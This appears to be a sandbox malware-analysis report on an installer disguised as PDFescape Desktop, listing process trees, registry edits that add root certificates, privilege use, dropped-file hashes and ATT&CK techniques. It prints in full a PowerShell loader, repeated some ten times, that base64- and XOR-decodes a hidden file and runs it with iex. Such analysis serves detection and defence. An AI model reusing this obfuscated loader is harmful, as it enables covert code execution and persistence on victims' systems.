Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\47BEABC922EAE80E78783462A79F45C254FDE68B\Blob = 19000000010000001000000021d008b47b7a2a81c8435903ded424c903000000010000001400000047beabc922eae80e78783462a79f45c254fde68b1d000000010000001000000070253fbcbde32a014d38c1993098ad991400000001000000140000003a9a8507106728b6eff6bd05416e20c194da0fde62000000010000002000000045140b3247eb9cc8c5b4f0d7b53091f73292089e6e5a63e2749dd3aca9198eda53000000010000002500000030233021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900200013202000470032000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000003560e45b41e46b8f36537025d1d5bc02d9652a10645b0eff69e8b6a52191f3352000000001000000c9030000308203c5308202ada003020102020100300d06092a864886f70d01010b0500308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a308183310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c65311a3018060355040a1311476f44616464792e636f6d2c20496e632e3131302f06035504031328476f20446164647920526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bf716208f1fa5934f71bc918a3f7804958e9228313a6c52043013b84f1e685499f27eaf6841b4ea0b4db7098c73201b1053e074eeef4fa4f2f593022e7ab19566be28007fcf316758039517be5f935b6744ea98d8213e4b63fa90383faa2be8a156a7fde0bc3b6191405caeac3a804943b467c320df3006622c88d696d368c1118b7d3b21c60b438fa028cced3dd4607de0a3eeb5d7cc87cfbb02b53a4926269512505611a44818c2ca9439623dfac3a819a0e29c51ca9e95d1eb69e9e300a39cef18880fb4b5dcc32ec85624325340256270191b43b702a3f6eb1e89c88017d9fd4f9db536d609dbf2ce758abb85f46fccec41b033c09eb49315c6946b3e0470203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604143a9a8507106728b6eff6bd05416e20c194da0fde300d06092a864886f70d01010b0500038201010099db5d79d5f99759670361f17e3b0631752da1208e4f6587b4f7a69cbcd8e92fd0db5aeecf748c73b43842da057bf80275b8fda5b1d7aef6d7de13cb53107e8a46d197fab72e2b11ab90b02780f9e89f5ae9379fabe4df6cb385179d3dd9244f799135d65f04eb8083ab9a022db510f4d890c7047340ed7225a0a99fec9eab68129957c68f123a09a4bd44fd061537c19be432a3ed38e8d864f32c7e14fc02ea9fcdff076817db2290382d7a8dd154f169e35f33ca7a3d7b0ae3ca7f5f39e5e275bac5761833ce2cf02f4cadf7b1e7ce4fa8c49b4a5406c57f7dd5080fe21cfe7e17b8ac5ef6d416b243090c4df6a76bb4998465ca7a88e2e244be5cf7ea1cf5	PDFescape_Desktop_Installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	PDFescape_Desktop_Installer.exe

Suspicious behavior: EnumeratesProcesses 54 IoCs

Processes:

PDFescape_Desktop_Installer.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3208	PDFescape_Desktop_Installer.exe
3208	PDFescape_Desktop_Installer.exe
4032	powershell.exe
4032	powershell.exe
1996	powershell.exe
1996	powershell.exe
4520	powershell.exe
4520	powershell.exe
4052	powershell.exe
4052	powershell.exe
4540	powershell.exe
4540	powershell.exe
4564	powershell.exe
4564	powershell.exe
2428	powershell.exe
2428	powershell.exe
2456	powershell.exe
2456	powershell.exe
212	powershell.exe
212	powershell.exe
2588	powershell.exe
2588	powershell.exe
4032	powershell.exe
1996	powershell.exe
4052	powershell.exe
4540	powershell.exe
4520	powershell.exe
4564	powershell.exe
2428	powershell.exe
2456	powershell.exe
2588	powershell.exe
212	powershell.exe
3208	PDFescape_Desktop_Installer.exe
3208	PDFescape_Desktop_Installer.exe
4032	powershell.exe
4052	powershell.exe
1996	powershell.exe
4540	powershell.exe
4520	powershell.exe
4564	powershell.exe
2456	powershell.exe
2428	powershell.exe
2588	powershell.exe
212	powershell.exe
4052	powershell.exe
4032	powershell.exe
4540	powershell.exe
1996	powershell.exe
2588	powershell.exe
4564	powershell.exe
4520	powershell.exe
2428	powershell.exe
2456	powershell.exe
212	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4032	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	4520	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	212	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exeaa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmpPDFescape_Desktop_Installer.exe

description	pid	process	target process
PID 4776 wrote to memory of 3624	4776	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp
PID 4776 wrote to memory of 3624	4776	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp
PID 4776 wrote to memory of 3624	4776	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp
PID 3624 wrote to memory of 3208	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	PDFescape_Desktop_Installer.exe
PID 3624 wrote to memory of 3208	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	PDFescape_Desktop_Installer.exe
PID 3624 wrote to memory of 3208	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	PDFescape_Desktop_Installer.exe
PID 3208 wrote to memory of 3300	3208	PDFescape_Desktop_Installer.exe	regsvr32.exe
PID 3208 wrote to memory of 3300	3208	PDFescape_Desktop_Installer.exe	regsvr32.exe
PID 3208 wrote to memory of 3300	3208	PDFescape_Desktop_Installer.exe	regsvr32.exe
PID 3208 wrote to memory of 644	3208	PDFescape_Desktop_Installer.exe	PDFescapeDesktopInstaller.exe
PID 3208 wrote to memory of 644	3208	PDFescape_Desktop_Installer.exe	PDFescapeDesktopInstaller.exe
PID 3208 wrote to memory of 644	3208	PDFescape_Desktop_Installer.exe	PDFescapeDesktopInstaller.exe
PID 3624 wrote to memory of 4052	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4052	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4052	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4032	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4032	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4032	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 1996	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 1996	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 1996	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4520	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4520	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4520	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4540	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4540	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4540	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4564	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4564	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 4564	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 2428	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 2428	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 2428	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 2456	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 2456	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 2456	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 2588	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 2588	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 2588	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 212	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 212	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe
PID 3624 wrote to memory of 212	3624	aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp	powershell.exe

C:\Users\Admin\AppData\Local\Temp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe
"C:\Users\Admin\AppData\Local\Temp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4776

C:\Users\Admin\AppData\Local\Temp\is-NJV28.tmp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NJV28.tmp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.tmp" /SL5="$20128,122284744,999424,C:\Users\Admin\AppData\Local\Temp\aa5ba0f6ce6bb84632d0dda729c787961b751c237372aa47dc49dc8a8a9a749d.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3624

C:\Users\Admin\AppData\Local\Temp\is-N5VCV.tmp\PDFescape_Desktop_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\is-N5VCV.tmp\PDFescape_Desktop_Installer.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3208

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"
4⤵
- Loads dropped DLL
- Modifies registry class
PID:3300

C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
"C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer
4⤵
- Executes dropped EXE
- Modifies registry class
PID:644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\b334e51d4ea060d1537ed6578ec6b67c\7c495718a0746a00cca29fc4cb8265f8\6ec4fc5df47982c5ad65703ba6bff4c1\3832e52a7a99d47796aaa1d595d9f292\1cf5365f65d7c15cc1faf9370eb58671\e16dc1acfd4b90247710b726b9631dd7\ef8fecc9126c67cd6d1ab0fbdd8bf85d';$xk='pXYwuQaqtMUhRkJgAmEdKbDjxvGCZonHBLSrilsONFTIeyWfVPcz';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}
1⤵
- Loads dropped DLL
PID:1012

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
MD5
87d28b3d2df1cab3711bf8d3b5b520c2

SHA1
1987a4bf2a37f6538c701461357a52b0bce1b980

SHA256
88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977

SHA512
19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4

Download Submit
C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
MD5
87d28b3d2df1cab3711bf8d3b5b520c2

SHA1
1987a4bf2a37f6538c701461357a52b0bce1b980

SHA256
88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977

SHA512
19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4

Download Submit
C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll
MD5
e5a591c125fdf21381cf543ed7706c66

SHA1
0baad9f119616ce5d0d39d4cdc9c884c1002a24e

SHA256
15b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6

SHA512
20e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
MD5
7f088ed96ad61139cb264b21a956d46f

SHA1
7dbb9322df3f12684e78cb9f2f9fba3ea00a2120

SHA256
73715ead5fee61bb62d290aac4b31a47b589a1f848dd225aec6dd4b08ea8771e

SHA512
afd25777b102cb04a6331017ad5582da293be7d126263e6bed975fb9c9c8b37548db9490881f4dd920608e165ccc38310abe5b025620e2181d1b9b93e526681f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A233D260C3B6986623715CAECF2512EB_DE0AA11A1E92E4679D5AAEA9F7AA6461
MD5
8b28dd2b66e5c5df655c06320395cb20

SHA1
06958614bb7bef8bfa6cdc7183ca2796b56c3752

SHA256
0a073eec4a24f769bc968a41da892e0433395fe66680f51de1596d4875577d00

SHA512
c0c70c7f68732af8fff93455026633915b66e0d95c33838103f3b069b90a4607ca8b72e4cec8dc913b6c4a2f31c35c1fe641790c1c636dad0b5badd5df0f6776

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771
MD5
5f1fb72d4f19a3cca4d4c3381aea5fef

SHA1
a82bef0745368b61d12a00f35818d3678495ca36

SHA256
ffc65686c5d1fe167e31f2e95157403e141330cd7f477ec59f5f69c9b2597ff3

SHA512
577d1f96def934261feb99fbc2d150e5972f233037495a19e3f44b6090cb8943207f047d2b8ae3b24a3a7ba5415e968de692ed427ff89dfe74b28dde5c651572

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A233D260C3B6986623715CAECF2512EB_DE0AA11A1E92E4679D5AAEA9F7AA6461
MD5
6962d8f3e5bbcbfad38b838c7a907079

SHA1
817af176fbfab2c372f65b8d90c5fbed5e084863

SHA256
bf135d80e52cf5b33f5a48eb94fb357a2f032b6ff4dc98bcda7d9507169cbba8

SHA512
dc9fa30fa05678319241dddf08971fb1a33258c273fa11708e1a0b732dfbecec6d80b85427c1d0c8c99a56e20594c19545e65dc79d6a1d8bb12bd997439964bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc

SHA1
75c07243f9cb80a9c7aed2865f9c5192cc920e7e

SHA256
91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

SHA512
db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
c2d06c11dd1f1a8b1dedc1a311ca8cdc

SHA1
75c07243f9cb80a9c7aed2865f9c5192cc920e7e

SHA256
91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

SHA512
